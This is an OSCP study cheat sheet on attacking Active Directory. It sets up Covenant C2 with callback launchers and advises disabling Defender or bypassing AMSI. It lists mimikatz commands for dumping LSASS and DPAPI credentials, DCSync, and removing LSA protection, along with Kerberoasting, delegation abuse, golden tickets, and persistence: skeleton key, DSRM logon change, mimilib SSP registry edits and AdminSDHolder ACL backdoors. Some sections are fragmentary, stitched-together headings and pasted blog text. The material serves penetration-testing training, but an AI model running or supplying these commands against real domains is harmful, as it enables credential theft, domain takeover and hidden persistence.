Oscp Notes Active Directory 1
https://www.linkedin.com/in/joas-antonio-dos-santos
Summary
Exam Info
Laboratory
Reconnaissance
Initial Access
Covenant C2 Setup
Covenant Attack – AD
Lateral Movement
Domain Privilege Escalation 1
Domain Persistence 1
Payload .NET
Cheat Sheet
  Privilege Escalation
  Lateral Movement
  Defense Evasion
  Credential Dumping
Exam Info
https://marmeus.com/post/OSCP-Review
https://medium.com/@0xP/oscp-2022-tips-to-help-you-pass-dddd3563967e
https://jaiguptanick.github.io/Blog/blog/OSCP_Cracking_New_Pattern_Walkthrough/
https://www.linkedin.com/pulse/oscp-tips-2022-lagarian-smith/?trk=articles_directory
https://dev.to/hackin7/my-oscp-experience-c9
Laboratory
Reconnaissance
Active Reconnaissance
Nmap
Ping sweep: nmap -sn [target]
UDP scan: nmap -sU [target]
nmap [target]          default TCP scan of the top 1000 ports
nmap -A [target]       aggressive: OS detection, version detection, default scripts, traceroute
nmap -6 [target]       IPv6 target
nmap -F [target]       fast mode (top 100 ports)
nmap -r [target]       scan ports in order instead of randomising them
Discovery options
-Pn            no ping / do not ping (treat every host as up; written -P0 in older versions)
-PU            UDP ping
-PO            IP protocol ping
-PR            ARP ping
--traceroute   traceroute to each host
nmap -R [target]       always resolve DNS
nmap -n [target]       never resolve DNS
Service/version detection: -sV
Script scan: -sC (default scripts) or --script <name>
OS detection: -O
Nmap switch description (evasion)
Fragment packets: nmap -f [target]
Use a decoy: nmap -D decoy1,decoy2,ME [target]
UDP scan: -sU
Xmas scan: -sX
IP protocol scan: -sO
Send IP packets: --send-ip
Timing options
Timing templates: -T0 (paranoid) to -T5 (insane)
Host timeout: --host-timeout <time>
Shellshock: nmap --script http-shellshock -p 80,443 [target]
Masscan
https://github.com/robertdavidgraham/masscan
GitHub
scanner/portscan
post/windows/gather/arp_scanner RHOST=<ip_range>
post/multi/manage/autoroute
Searchsploit
searchsploit <keyword>
PS C:\> .\ADRecon.ps1
Run ADRecon with specific modules from a non-member host that has RSAT installed (the default OutputType is STDOUT when the -Collect parameter is given).
When you run ADRecon, an ADRecon-Report-<timestamp> folder is created containing ADRecon-Report.xlsx and a CSV-Folder with the raw files.
https://github.com/sense-of-security/ADRecon
https://github.com/outflanknl/Recon-AD
Using BloodHound
Use the correct collector:
• AzureHound for Azure Active Directory
• SharpHound for on-premises Active Directory
# AzureHound
# requires: Install-Module -Name Az -AllowClobber
# requires: Install-Module -Name AzureADPreview -AllowClobber
Connect-AzureAD
Connect-AzAccount
. .\AzureHound.ps1
Invoke-AzureHound
# BloodHound: run the collector on a domain-joined machine using SharpHound.exe
# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
# on Kali: /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe
.\SharpHound.exe -c all -d active.htb --searchforest
.\SharpHound.exe -c all,GPOLocalGroup          # "all" does not include GPOLocalGroup by default
.\SharpHound.exe --CollectionMethod DCOnly     # only query the DC, never the workstations (more stealthy)
Using PowerView
# Domain policy: system access (password/lockout) and kerberos policy settings
(Get-DomainPolicy)."system access"
(Get-DomainPolicy)."kerberos policy"
# Get domain controllers
Get-NetDomainController
Get-NetDomainController -Domain <DomainName>
# Enumerate domain users
Get-NetUser
Get-NetUser -SamAccountName <user>
Get-NetUser | select cn
Get-UserProperty
# Check last password change
Get-UserProperty -Properties pwdlastset
# All GPOs in the domain that modify local group memberships through Restricted Groups or Group Policy Preferences
Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
# Enumerate domain shares
Find-DomainShare
# ACLs of a given path (e.g. an SMB share)
Get-PathAcl -Path "\\Path\Of\A\Share"
# Enumerate domain trusts
Get-NetDomainTrust
Get-NetDomainTrust -Domain <DomainName>
# Enumerate forest domains
Get-NetForestDomain
Get-NetForestDomain -Forest <ForestName>
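The PowerView commands above are listed one by one; the following script, an added example that is not part of the original notes, runs them as a single enumeration pass and writes the results to CSV files so the interesting objects (SPN users, accounts without pre-auth, delegation-enabled computers, GPO-pushed local groups, trusts) can be reviewed offline. It assumes PowerView.ps1 in the current directory and a session that already holds domain-user credentials; the output folder name is an arbitrary choice.

```powershell
# Added example (not from the original notes): one PowerView pass over the items
# the cheat-sheet enumerates individually. Assumes PowerView.ps1 in the current
# directory and an existing domain-user context.
. .\PowerView.ps1

$out = Join-Path $PWD 'ad-enum'          # arbitrary output folder
New-Item -ItemType Directory -Force -Path $out | Out-Null

# Domain policy: lockout threshold and ticket lifetimes decide how aggressive
# spraying and roasting can be. Key names differ between PowerView versions,
# so the whole hashtable is dumped rather than one key.
Get-DomainPolicy | Format-List | Out-File "$out\domain-policy.txt"

# Domain controllers and trusts (direction and SID filtering matter later).
Get-DomainController | Select-Object Name, IPAddress, OSVersion |
    Export-Csv "$out\dcs.csv" -NoTypeInformation
Get-DomainTrust | Export-Csv "$out\trusts.csv" -NoTypeInformation
Get-ForestDomain | Select-Object Name | Export-Csv "$out\forest-domains.csv" -NoTypeInformation

# Users: stale password changes, SPN-bearing accounts (Kerberoast targets) and
# accounts without Kerberos pre-authentication (AS-REP roast targets).
Get-DomainUser | Select-Object samaccountname, pwdlastset, lastlogon, description |
    Export-Csv "$out\users.csv" -NoTypeInformation
Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname |
    Export-Csv "$out\users-spn.csv" -NoTypeInformation
Get-DomainUser -PreauthNotRequired | Select-Object samaccountname |
    Export-Csv "$out\users-nopreauth.csv" -NoTypeInformation

# Computers with delegation settings (abused in the escalation section).
Get-DomainComputer -Unconstrained | Select-Object dnshostname |
    Export-Csv "$out\computers-unconstrained.csv" -NoTypeInformation
Get-DomainComputer -TrustedToAuth | Select-Object dnshostname, 'msds-allowedtodelegateto' |
    Export-Csv "$out\computers-constrained.csv" -NoTypeInformation

# GPOs that push local group membership, and shares we can actually read.
Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName |
    Export-Csv "$out\gpo-localgroups.csv" -NoTypeInformation
Find-DomainShare -CheckShareAccess | Export-Csv "$out\shares.csv" -NoTypeInformation

Get-ChildItem $out
```

Every query here is a plain LDAP read (plus one SMB connection per host for the share check), so it is no louder than the individual commands in the list; the share enumeration is the part most likely to be noticed, and can be dropped if the engagement calls for a quiet first pass.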
Initial Access
https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell
https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office
https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean
https://www.ired.team/offensive-security/code-execution
Bash Bunny
USB Drop Attacks: The Danger of “Lost And Found” Thumb Drives
Weaponizing data science for social engineering: Automated E2E spear phishing on Twitter -
Defcon 24
POWERSHELL EMPIRE STAGERS 1: PHISHING WITH AN OFFICE MACRO AND EVADING AVS
Executing Metasploit & Empire Payloads from MS Office Document Properties (part 1 of 2)
Executing Metasploit & Empire Payloads from MS Office Document Properties (part 2 of 2)
Using Social Engineering Tactics For Big Data Espionage - RSA Conference Europe 2012
Defense-In-Depth write-up
https://0x1.gitlab.io/pentesting/Red-Teaming-Toolkit/
Covenant C2 Setup
https://captainroot.com/blog/getting-started-with-covenant-c2-in-kali-linux/
https://michaelkoczwara.medium.com/covenant-c2-quick-setup-on-windows-296a0d400de2
This is a quick walkthrough on installing the Covenant command and control (C2) framework on Kali Linux. I tested this on Kali 2020.3, but it should work for later versions as well. Let's get started.
First, you need to download the .NET Core SDK for Linux. At the time of writing the latest version was 3.1; find the latest *recommended* release on the official .NET downloads page (dotnet.microsoft.com). .NET Core is the cross-platform version of .NET.
I have a 64-bit Kali Linux. Several write-ups recommend 64-bit rather than 32-bit Kali when installing Covenant. I downloaded the 64-bit .NET SDK package from the .NET Core 3.1 download page.
Once the tar.gz file is on the Kali host, follow Microsoft's manual-install instructions to extract it and set the environment variables; the steps are repeated here for clarity. Extract the archive into $HOME/dotnet (the tarball name depends on the version you downloaded):
mkdir -p $HOME/dotnet && tar zxf <dotnet-sdk-3.1.x-linux-x64.tar.gz> -C $HOME/dotnet
Now set the environment variables required with the following commands:
export DOTNET_ROOT=$HOME/dotnet
export PATH=$PATH:$HOME/dotnet
That completes the .NET Core setup needed for Covenant. Now let's install Covenant itself. I installed it under ~/tools, so change the location as you need:
cd ~/tools
git clone --recurse-submodules https://github.com/cobbr/Covenant
This downloads Covenant from its GitHub repository (about 141 MB). Once downloaded:
cd Covenant/Covenant
dotnet build
This builds the Covenant project; on success dotnet prints a "Build succeeded" message. Then start it:
dotnet run
This starts the Covenant web service on TCP port 7443. You can check this from another terminal:
# netstat -tnlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address   Foreign Address  State   PID/Program name
tcp   0      0      0.0.0.0:7443    0.0.0.0:*        LISTEN  1650543/Covenant
Now open a web browser and point it at port 7443 of your Kali host: if the Kali IP is 192.168.1.10, browse to https://192.168.1.10:7443. You will get a certificate warning (Covenant generates a self-signed certificate); accept it for now and you are redirected to /covenantuser/login. If everything has gone well, this shows the Covenant initial user registration page.
Provide a username and password to register an account. Remember this password or save it securely; it is the administrative account of the C2.
Once logged in, you are taken to /home/index, the Covenant dashboard.
https://dian-pentest.medium.com/install-covenant-on-kali-linux-c0350804648d
Covenant Attack – AD
https://www.youtube.com/watch?v=6C8tzKb3kEQ
https://infosecwriteups.com/hack-the-box-sauna-write-up-w-covenant-c2-c2d71141c90b
Creating Listener
Before we can use Covenant for red team activity, the first thing to set up is a Listener. A Covenant Listener plays the same role as the listeners used with netcat or Meterpreter: it waits for implants to call back. In Covenant the implant is called a Grunt; the stager that starts it is produced by a Launcher, covered below. First, create the listener from the Listeners menu.
• Name: identifier of the listener; a default is generated, but you can set your own
• ConnectAddress & ConnectPort: address and port the stager will connect back to (they must be reachable from the target, so use the interface facing the victim network, not 127.0.0.1)
After the listener is created it shows in the listener list. For example, here a listener named First-Listener of type HTTP is created.
Listener
Start the listener created above; the listener view then shows the new information, as in the figure below.
Start Listener
Listener Active
We can double-check that the listener is active with a netstat/ss command in a terminal, as done for port 7443 earlier.
Launcher
Launchers are an all-in-one payload delivery feature that generates, hosts, and downloads binaries/scripts to launch new Grunts.
Covenant Launcher
• Binary: generates a custom binary that launches a Grunt. This is currently the only launcher that does not rely on a system binary.
• MSBuild: generates an MSBuild XML file that launches a Grunt using msbuild.exe.
• InstallUtil: generates an InstallUtil XML file that launches a Grunt using installutil.exe.
• Mshta: generates an HTA file and/or an mshta one-liner that launches a Grunt using mshta.exe; relies on DotNetToJScript.
• Regsvr32: generates an SCT file and/or a regsvr32 one-liner that launches a Grunt using regsvr32.exe; relies on DotNetToJScript.
• Wmic: generates an XSL file and/or a wmic one-liner that launches a Grunt using wmic.exe; relies on DotNetToJScript.
• Cscript: generates a JScript file that launches a Grunt using cscript.exe; relies on DotNetToJScript.
For this article the PowerShell launcher is used as the example. Don't forget to disable Windows Defender or bypass AMSI first (it will be discussed later).
Creating Launcher
Create PowerShellLauncher
Choose and customise the options for your environment; GruntHTTP is the suggested implant template. Click Generate and Covenant produces both a launcher and a Base64-encoded launcher.
Generated launcher
Testing Launcher
Test the launcher on a Windows box to see how the payload and the communication work: open a command prompt and paste the generated launcher.
Powershell launcher
As the picture above shows, the launcher connected successfully to the listener and a Grunt appeared. This is what it looks like in the Grunts view:
Grunt information
We can interact with the victim machine using the Interact feature of the Grunt.
Grunt interaction
That is all for this getting-started article about Covenant C2; more Covenant features will be covered in the next article.
If you like this article, please share it; feedback is always welcome.
Reference:
• https://posts.specterops.io/entering-a-covenant-net-command-and-control-
e11038bcf462
https://petruknisme.medium.com/getting-started-with-covenant-c2-for-red-teaming-
8eeb94273b52
https://github.com/active-labs/ACTIVEBlog/blob/master/Red%20Team%20Infrastructure%20-
%20C2/Red%20Team%20Infrastructure%20-%20C2.md
• Windows Privilege Escalation CheatSheet Cheat Sheet for Windows Local Privilege
Escalations
Works only until Windows Server 2016 and Windows 10 until patch 1803
• SMBGhost CVE-2020-0796
PoC
• CVE-2021-36934 (HiveNightmare/SeriousSAM)
Enable-PSRemoting
Mimikatz
mimikatz privilege::debug
mimikatz token::elevate
mimikatz sekurlsa::logonpasswords
mimikatz privilege::debug
mimikatz sekurlsa::tickets
mimikatz sekurlsa::tspkg
mimikatz sekurlsa::dpapi
mimikatz sekurlsa::ekeys
mimikatz lsadump::sam
mimikatz lsadump::secrets
mimikatz token::elevate
#Dump the domain's credentials without touching the DC's LSASS, also remotely (DCSync, lsadump::dcsync; see the DCSync section)
mimikatz ts::sessions
mimikatz vault::list
• #Check if LSA runs as a protected process: the registry value RunAsPPL under HKLM\SYSTEM\CurrentControlSet\Control\Lsa is set to 0x1
• #If so, upload mimidriver.sys from the official mimikatz repo to the same folder as mimikatz.exe, load it and strip the protection from LSASS
• mimikatz # !+
• mimikatz # !processprotect /process:lsass.exe /remove
• #Finally run the logonpasswords function to dump LSASS
mimikatz # sekurlsa::logonpasswords
o PPLdump (user-mode alternative to loading the driver)
• #If Credential Guard is enabled there is no way to dump LSASS secrets: we only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data, or hook the authentication path:
• #Inject a malicious Security Support Provider into memory; for this example the one mimikatz provides
• mimikatz # misc::memssp
#Now every user session and authentication on this machine gets logged and plaintext credentials are captured and written to C:\Windows\System32\mimilsa.log
POWERSHELL REMOTING
Invoke-Mimikatz -DumpCreds
Enter-PSSession $sess
exit
Enter-PSSession $sess
# DUMPING
FORWARDER
# RULE
# CHECK
# RESET
KERBEROS DOUBLE HOP - remote ticket dumping - SMB lateral movement (skill)
• A command you run on ServerB via your PowerShell Remoting session attempts to access a resource on ServerC.
Access to the resource on ServerC is denied, because the credentials you used to create the PowerShell Remoting session are not passed from ServerB to ServerC (WinRM gives ServerB a network logon that carries no reusable credential).
Remoting sessions cannot be nested to carry the credential across.
Delegation (CredSSP / Kerberos delegation) is assumed not to be available.
# PSREMOTE TO SERVER A
# CHECK INJECTION (after injecting a ticket on ServerB, the second hop should succeed):
Invoke-Command -ScriptBlock { ls \\serverc\c$ } -Session $serverb
# RCE ON SERVER C:
WUT IS DIS?:
Any domain user can request a service ticket (TGS) for any SPN, including SPNs registered on user accounts. Part of that ticket is encrypted with the service account's password hash, so we extract the encrypted blob and brute-force it offline.
• PowerView:
Get-NetUser -SPN
• #Get every available SPN account, request a TGS and dump its hash
Invoke-Kerberoast
Request-SPNTicket
• AD Module:
Rubeus:
• #Kerberoasting while staying "OPSEC" safe, i.e. not trying to roast AES-enabled accounts (Rubeus kerberoast /rc4opsec)
ASREPRoast
WUT IS DIS?:
If a domain user account does not require Kerberos pre-authentication, we can request an AS-REP for that account without having any domain credentials; part of the reply is encrypted with the user's key, so we extract the encrypted blob and brute-force it offline.
We can also forcefully disable Kerberos pre-auth on an account over which we hold write permissions or more, so first check for interesting permissions on accounts.
Hint: add a filter (e.g. the RDPUsers group) to get user accounts rather than machine accounts, because machine account passwords are long random strings and are not crackable!
PowerView:
Invoke-ASREPRoast -Verbose
• Using Rubeus:
• Using Impacket:
Password Spraying
If we have harvested some passwords by compromising a user account, we can use this method to try to exploit password reuse on other domain accounts. Check the lockout policy first (net accounts /domain) and stay below the threshold.
Tools:
• DomainPasswordSpray
• CrackMapExec
• Invoke-CleverSpray
• Spray
Targeted Kerberoasting
WUT IS DIS ?: If we have enough permissions (GenericAll/GenericWrite) over a user, we can set an SPN on that target account, request a TGS, then grab its blob and brute-force it.
• PowerView:
• #Check if the target user already has an SPN set:
• AD Module:
Finally use any tool from before to grab the hash and kerberoast it!
If you have local administrator access on a machine, list its shadow copies (vssadmin list shadows); on a DC they are an easy route to domain escalation.
1. You can dump the backed-up SAM database (or ntds.dit from a DC shadow copy) and harvest credentials.
DPAPI credential files live in:
• %appdata%\Microsoft\Credentials
• %localappdata%\Microsoft\Credentials
#The cred module of mimikatz parses a credential blob and gives us information about it:
dpapi::cred /in:"%appdata%\Microsoft\Credentials\<CredHash>"
#From the output we need the "guidMasterKey" value: it names the master key file (under the user's Protect folder) that was used to encrypt the credential
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<usersid>\<MasterKeyGUID>"
#If we are in the context of the user (or of SYSTEM) the credential belongs to, the /rpc flag asks the domain controller to decrypt the master key for us (via the domain backup key):
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<usersid>\<MasterKeyGUID>" /rpc
#The decrypted master key is now in the mimikatz cache, so the credential can be decrypted
dpapi::cache
dpapi::cred /in:"%appdata%\Microsoft\Credentials\<CredHash>"
Unconstrained Delegation
Using PowerView:
Get-NetComputer -UnConstrained
#On such a host, list the cached tickets (sekurlsa::tickets) and check whether a DA or another high-value account has left its TGT there
Constrained Delegation
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
#If we control a user that has constrained delegation, ask for a valid TGT of this user with kekeo (tgt::ask, using its password or hash)
#Then, using that TGT, ask for a TGS (tgs::s4u) for a service this user may delegate to
What if we have delegation rights for only a specific SPN (e.g. TIME)?
In this case we can still abuse a property of Kerberos tickets sometimes called "alternative service": the service name in a TGS is not part of the encrypted, signed portion of the ticket, so a ticket obtained for the allowed SPN can be rewritten for any other service class (CIFS, HOST, LDAP, ...) on the same host. That gives us valid tickets for any service the host supports and, in practice, full access over the target machine.
WUT IS DIS?:
TL;DR
If we have GenericAll/GenericWrite privileges on a machine account object of a domain, we can abuse it (by writing msDS-AllowedToActOnBehalfOfOtherIdentity) to impersonate any user of the domain towards that machine. For example we can impersonate a Domain Administrator and get complete access.
Tools:
• PowerView
• Powermad
• Rubeus
First we need to enter the security context of the user/machine account that has the privileges over the object. If it is a user account we can use Pass the Hash, RDP, PSCredentials etc.
Exploitation Example:
#Import Powermad and create a new machine account that we control (MachineAccountQuota allows this by default)
. .\Powermad.ps1
#Import PowerView and get the SID of our newly created machine account
. .\PowerView.ps1
#Then, using the SID, build an ACE for the new machine account with a raw security descriptor and write it into the target's msDS-AllowedToActOnBehalfOfOtherIdentity:
$SD.GetBinaryForm($SDBytes, 0)
#After that we need the RC4 hash of the new machine account's password (Rubeus hash)
#And for this example we impersonate the Domain Administrator on the cifs service of the target computer using Rubeus s4u (/ptt)
dir \\TargetMachine.wtver.domain\C$
Detailed Articles:
#Command on Rubeus
WUT IS DIS ?: If we manage to compromise a user account that is a member of the Backup Operators group, we can abuse its SeBackupPrivilege to create a shadow copy of the current state of the DC, extract the ntds.dit database file, dump the hashes and escalate our privileges to DA.
1. Once we have access to an account that has SeBackupPrivilege we can access the DC and create a shadow copy using the signed binary diskshadow:
#Create a .txt file that will contain the shadow copy process script
Script -> {
set verbose on
begin backup
create
}
diskshadow /s script.txt
2. Next we need to access the shadow copy. We may hold SeBackupPrivilege, but we cannot simply copy-paste ntds.dit: we have to mimic backup software and use the Win32 backup API calls to copy it to an accessible folder. For this we use this amazing repo (the SeBackupPrivilege cmdlets):
Get-SeBackupPrivilege
Set-SeBackupPrivilege
#Use the functionality of the DLLs to copy the ntds.dit database file from the shadow copy to a location of our choice
3. Use psexec or another tool of your choice to PTH and get Domain Admin access.
Abusing Exchange
• CVE-2020-0688
• PrivExchange Exchange your privileges for Domain Admin privs by abusing Exchange
• NetNTLMtoSilverTicket
Abusing ACLs
• aclpwn.py
• Invoke-ACLPwn
• mitm6
WUT IS DIS?: If we manage to compromise a child domain of a forest and SID filtering is not enforced on the trust (it is off by default for intra-forest parent/child trusts), we can escalate to Domain Administrator of the forest root. This is possible because the SID History field of a Kerberos TGT (the ExtraSids in the PAC) carries "extra" security groups and privileges, and we can forge a TGT that claims membership of the root's Enterprise Admins group.
Exploitation example:
#Get the SID of the root domain's Enterprise Admins group. Format: RootDomainSID-519
#Forge an "extra SID" golden ticket with mimikatz (kerberos::golden ... /sids:<RootDomainSID>-519) and inject it
kerberos::ptt \path\to\ticket\golden.kirbi
dir \\dc.root.domain.local\C$
Detailed Articles:
Exploiting SharePoint
Zerologon
PrintNightmare
Note: Certify can be executed with Cobalt Strike's execute-assembly command as well
This exploit only works because these settings enable server/client authentication, meaning an
attacker can specify the UPN of a Domain Admin ("DA") and use the captured certificate with
Rubeus to forge authentication.
Note: If a Domain Admin is in a Protected Users group, the exploit may not work as intended.
Check before choosing a DA to target.
The exported cert.pem and cert.key files must be consolidated into a single cert.pem file: the private key first, then the certificate, with one blank line between END RSA PRIVATE KEY and BEGIN CERTIFICATE.
Example of cert.pem:
-----BEGIN RSA PRIVATE KEY-----
BIIEogIBAAk15x0ID[...]
[...]
-----END RSA PRIVATE KEY-----

-----BEGIN CERTIFICATE-----
BIIEogIBOmgAwIbSe[...]
[...]
-----END CERTIFICATE-----
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Once the cert.pfx file has been exported, upload it to the compromised host (this can be done
in a variety of ways, such as with Powershell, SMB, certutil.exe, Cobalt Strike's upload
functionality, etc.)
After the cert.pfx file has been uploaded to the compromised host, Rubeus can be used to
request a Kerberos TGT for the DA account which will then be imported into memory.
This should result in a successfully imported ticket, which then lets the attacker act under the DA user context, for example to perform a DCSync attack.
No PAC
Domain Persistence 1
DCsync Attack
Tip:
/ptt -> inject ticket on current running session
/ticket -> save the ticket on the system for later use
SPN List
DSRM Abuse
WUT IS DIS?: Every DC has a local Administrator account whose password is the DSRM password (SafeModeAdministratorPassword, set when the DC was promoted and rarely rotated). We can dump its NTLM hash from the DC's SAM and pass the hash to get local Administrator access to the DC!
#BUT we need to alter the logon behaviour of the DSRM account before PTH (DsrmAdminLogonBehavior = 2 allows network logons with it):
#Connect on DC:
Custom SSP
WUT IS DIS?: We can register our own SSP by dropping a custom DLL, for example mimilib.dll from mimikatz, that monitors and captures plaintext passwords of users who log on!
From powershell:
#Append mimilib to the "Security Packages" registry value:
$packages += "mimilib"
#ALTERNATIVE (in memory only, lost at reboot): mimikatz misc::memssp
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
ACCOUNT DUMPING
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername DC01
GOLDEN TICKET
On any machine
SILVER TICKET
# Check WMI
• Create a silver ticket for the HOST SPN which will allow us to schedule a task
SKELETON KEY
# REMOTE
$sess = New-PSSession DC01.domain.local
# OR
# LOGIN
# PASSWORD mimikatz
mimikatz # privilege::debug
mimikatz # !+
mimikatz # misc::skeleton
mimikatz # !-
DSRM
#Allow the DSRM account to log on over the network (completes the fragment in the notes):
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
#Pass the hash; /domain is the DC host name, because this is a local account of the DC:
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:DC01 /user:Administrator /ntlm:00000000000000000000000000000000 /run:powershell.exe"'
#Custom SSP (mimilib.dll must already be in C:\Windows\System32 on the DC):
$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
$packages += "mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $packages
# CHECK C:\Windows\system32\kiwissp.log after the next logons (the package is loaded when LSASS starts, i.e. after a reboot)
ADMINSDHOLDER
• The Security Descriptor Propagator (SDProp) runs every hour, compares the ACL of protected groups and their members with the ACL of AdminSDHolder, and overwrites any difference on the object's ACL
Protected groups: Account Operators, Backup Operators, Server Operators, Print Operators, Replicator, Administrators, Domain Admins, Enterprise Admins, Schema Admins, Domain Controllers, Read-only Domain Controllers (plus the Administrator and krbtgt accounts)
Groups resume (what the lesser protected groups buy us):
Account Operators: cannot modify the DA/EA/BA groups, but can modify nested groups within them
Server Operators: run a command as SYSTEM on a DC (using the disabled Browser service)
#Give 'attacker' full control over AdminSDHolder (Nishang's Set-ADACL; the old-PowerView alternative follows):
Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=test,DC=domain,DC=local' -Principal attacker -Verbose
#
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName attacker -Rights WriteMembers -Verbose
#Do not wait an hour: trigger SDProp manually
Import-Module .\Invoke-SDPropagator.ps1
Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose
# CHECK that the ACE was stamped on a protected group
. .\PowerView.ps1
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | Where-Object { $_.IdentityReference -match 'attacker' }
# DCSYNC
Rights Abuse
• Add FullControl (or just the replication rights) on the domain object for 'attacker'
Add-ObjectAcl -TargetDistinguishedName 'DC=domain,DC=local' -PrincipalSamAccountName attacker -Rights DCSync -Verbose
• Execute DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
SECURITY DESCRIPTORS
• WMI
• PSREMOTE
• REMOTE REGISTRY
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-
Sheet/tree/master/H%20-%20Persistence
Payload .NET
Additional Reading
Research:
• https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/december/beware-of-deserialisation-in-.net-methods-and-classes-code-execution-via-paste/
• https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/march/finding-and-exploiting-.net-remoting-over-http-using-deserialisation/
• https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/august/aspnet-resource-files-resx-and-deserialisation-issues/
• https://www.nccgroup.trust/uk/our-research/use-of-deserialisation-in-.net-framework-methods-and-classes/?research=Whitepapers
• https://community.microfocus.com/t5/Security-Research-Blog/New-NET-deserialization-gadget-for-compact-payload-When-size/ba-p/1763282
• https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/
• https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/august/getting-shell-with-xamlx-files/
• https://soroush.secproject.com/blog/2019/08/uploading-web-config-for-fun-and-profit-2/
Usage:
• https://cert.360.cn/warning/detail?id=e689288863456481733e01b093c986b6
• https://labs.mwrinfosecurity.com/advisories/milestone-xprotect-net-deserialization-vulnerability/
• https://soroush.secproject.com/blog/2018/12/story-of-two-published-rces-in-sharepoint-workflows/
• https://srcincite.io/blog/2018/08/31/you-cant-contain-me-analyzing-and-exploiting-an-elevation-of-privilege-in-docker-for-windows.html
• https://www.redteam-pentesting.de/de/advisories/rt-sa-2017-014/-cyberark-password-vault-web-access-remote-code-execution
• https://www.synacktiv.com/ressources/advisories/Sitecore_CSRF_deserialize_RCE.pdf
• https://www.zerodayinitiative.com/blog/2019/3/13/cve-2019-0604-details-of-a-microsoft-sharepoint-rce-vulnerability
• https://www.zerodayinitiative.com/blog/2018/8/14/voicemail-vandalism-getting-remote-code-execution-on-microsoft-exchange-server
• https://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-vulnerabilities-in-smartermail/
• https://www.nccgroup.trust/uk/our-research/technical-advisory-code-execution-by-viewing-resource-files-in-net-reflector/
• https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/
• https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys
Talks:
• https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf
• https://speakerdeck.com/pwntester/attacking-net-serialization
• https://speakerdeck.com/pwntester/dot-net-serialization-detecting-and-defending-vulnerable-endpoints
• https://gosecure.github.io/presentations/2018-03-18-confoo_mtl/Security_boot_camp_for_.NET_developers_Confoo_v2.pdf
• https://illuminopi.com/assets/files/BSidesIowa_RCEvil.net_20190420.pdf
• https://nullcon.net/website/archives/pdf/goa-2018/rohit-slides.pdf
Tools:
• https://github.com/pwntester/ViewStatePayloadGenerator
• https://github.com/0xACB/viewgen
• https://github.com/Illuminopi/RCEvil.NET
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Cheat Sheet
Privilege Escalation
PASSWORDS IN SYSVOL & GROUP POLICY PREFERENCES
DNSADMINS
• From DNSAdmins to Domain Admin, When DNSAdmins is More than Just DNS
Administration
UNCONSTRAINED DELEGATION
• Active Directory Security Risk #101: Kerberos Unconstrained Delegation (or How
Compromise of a Single Server Can Compromise the Domain)
CONSTRAINED DELEGATION
• S4U2Pwnage
DOMAIN TRUSTS
• It’s All About Trust – Forging Kerberos Trust Tickets to Spoof Access across Active
Directory Trusts
• Active Directory forest trusts part 1 - How does SID filtering work?
• The Forest Is Under Control. Taking over the entire Active Directory forest
• The Trustpocalypse
DCSHADOW
• DCShadow
• DCShadow explained: A technical deep dive into the latest AD attack technique
RID
• How to get SQL Server Sysadmin Privileges as a Local Admin with PowerUpSQL
RED FOREST
Lateral Movement
MICROSOFT SQL SERVER DATABASE LINKS
• SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server!
WSUS
• WSUSpendu
PASSWORD SPRAYING
Defense Evasion
IN-MEMORY EVASION
OPSEC
• Red Team Techniques for Evading, Bypassing, and Disabling MS Advanced Threat
Protection and Advanced Threat Analytics
• Invisi-Shell - Hide your Powershell script in plain sight. Bypass all Powershell security
features
• Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts)
SYSMON EVASION
• sysmon-config-bypass-finder
HONEYTOKENS EVASION
Credential Dumping
NTDS.DIT PASSWORD EXTRACTION
• How Attackers Pull the Active Directory Database (NTDS.dit) from a Domain Controller
KERBEROASTING
• Roasting AS-REPs
DCSYNC
• Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync
LLMNR/NBT-NS POISONING
• Pwning with Responder – A Pentester’s Guide
OTHER
Persistence
GOLDEN TICKET
